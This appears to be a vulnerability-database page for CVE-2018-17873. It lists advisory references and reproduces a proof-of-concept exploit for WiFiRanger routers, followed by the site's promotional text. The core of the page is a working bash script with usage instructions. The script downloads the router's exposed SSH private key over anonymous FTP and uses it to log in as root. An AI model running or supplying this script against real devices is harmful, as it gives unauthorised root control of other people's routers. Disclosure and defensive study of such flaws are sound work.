| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| The vulnerability of the WiFiRanger router’s microprogramming software, related to key management errors, allows a hacker to obtain access to the SSH key and gain root account access to the system. | 23 Dec 201900:00 | – | bdu_fstec | |
| CVE-2018-17873 | 23 Oct 201821:00 | – | cve | |
| CVE-2018-17873 | 23 Oct 201821:00 | – | cvelist | |
| EUVD-2018-9615 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-17873 | 23 Oct 201821:30 | – | nvd | |
| CVE-2018-17873 | 23 Oct 201821:30 | – | osv | |
| WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation | 19 Oct 201800:00 | – | packetstorm | |
| Improper access control | 23 Oct 201821:30 | – | prion |
# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873
# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.
# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>
#!/bin/bash
wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa [email protected]$1
# 0day.today [2018-10-22] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation